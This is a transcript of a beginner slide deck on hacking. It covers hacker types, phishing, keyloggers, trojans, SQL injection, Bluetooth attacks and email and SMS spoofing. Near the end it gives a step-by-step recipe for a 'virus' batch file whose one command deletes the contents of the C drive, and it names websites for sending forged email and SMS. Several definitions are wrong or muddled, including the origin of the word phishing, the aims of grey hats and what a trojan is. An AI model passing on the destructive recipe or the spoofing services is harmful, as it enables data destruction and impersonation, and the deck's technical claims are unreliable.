hacking ,bluetooth
TRANSCRIPT
DIFFERENCE BETWEEN SECURITY AND PROTECTION
Security and protection are extremely close
concepts though not same.
Security measures are adopted to increase
the level of protection
The feeling of protection arises when one
has enough security measures
Security is a type of protection against
external threats.
HACKER AND ETHICAL HACKER
Hacker
• Access computer system or network withoutauthorization
• Breaks the law
Ethical Hacker
• Performs most of the same activities but with owner’spermission
• Employed by companies to perform Penetration Tests
TYPES OF HACKER White Hat Hacker
• Good guys
• Don’t use their skill for illegal purpose
• Computer security experts and help to protect fromBlack Hats.
Black Hat Hacker
• Bad guys
• Use their skill maliciously for personal gain
• Hack banks, steal credit cards and deface websites
Grey Hat Hacker
• It is a combination of White hat n Black Hat Hackers
• Goal of grey hat hackers is to provide national security
HACKING PROCESS
Footprinting
Scanning
EnumerationAttack and Gaining
Access
Escalating Privilege, Covering Tracks and Creating Backdoors
TYPES OF HACKING
Phishing
Key loggers
Trojans
Sql injection
Kali Linux (back-track)
Bluetooth hacking
PHISHING
• Pronounced "fishing“
• The word has its Origin from two words “Password Harvesting” or fishing for Passwords
• Phishing is an online form of pretexting, a kind of deception in which an attacker pretends to be someone else in order to obtain sensitive information from the victim
• Also known as "brand spoofing“
• Phishers are phishing artists
KEYLOGGING
A program or hardware device that captures every key depression on the computer
Key Loggers record keystrokes:
• Legitimate use: Monitor employee productivity
• Illegal uses: Steal passwords, usernames, and other personal/corporate data
There are ways to protect yourself:
• Be aware of what’s installed on your computer
• Use caution when surfing the internet
• Keep your computer’s security software
updated
TROJAN HORSE
A computer virus is a computer program that can copy itself and infect a computer without
permission or knowledge of the user.
Type Of Trojan Horse Hacking
There are two types of Trojan Horse :
-Time Bomb and Logic Bomb
-Droppers
We need to be careful when download something.
We also need an anti-virus to protect our computer
from be infected by virus.
SQL INJECTION:
• SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed.
• URL based injection:
• Avoid using clear text when coding in SQL.
• If your database and webpage are constructed in a way where you can view the data, it’s open to injection.
• http://mysite.com/listauthordetails.aspx?SSN=172-32-9999
• As in prior example, you could add a drop, or other command, to alter the database.
• Passwords, and other sensitive information need to be either encrypted or one way hashed. There is no full proof way to defend from injection, but by limiting sensitive information, you can insure that your information is at least somewhat protected.
Kali Linux is a Debian-derived Linux
distribution designed for digital
forensics and penetration testing. It is
maintained and funded by Offensive
Security Ltd
* It is used to hack any anti virus, website..etc
BLUETOOTH ATTACK• Why Bluesnarfing attack happens ?
- vendors implementation of OBEX protocol
• Three profiles use the OBEX protocol:
- Synchronization Profile (secure)
- File Transfer Profile (secure)
- Object Push (insecure)
File Transfer
Profile
Aplication
Object Push
Business
Card
Synchronization
Phone Book,
Calender
OBEX
Lower Layers
Application Layer
Session Layer
EMAIL FORGING
Definition:
Email Forging is the art of sending an email from the victim’s email account without knowing the password.
Working:
• ATTACKER-----Sends Forged email----- FROM VICTIM
WEBSITES: https://emkei.cz, www.anonymailer.net...
SMS FORGING
• Now the concept of SMS forging lies in changing the SCCP packer which containsthe sender information prior delivering to the SMS gateway.
• The intruder can change the SCCP packet and can send that packet to any of the receiver as a spoofed SMS.
• Some of the Website on the net also provide this facility.
• To provide such service is not legal and the user using this may lead soserious consequences with law.
• Website: http://www.spranked.com
Open Notepad and copy below code into it.@Echo offDel C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Virus using commands on notepad
The Certified Ethical Hacker is
a professional certification, provided by
the International Council of E-Commerce
Consultants (EC-Council.)
CEH V8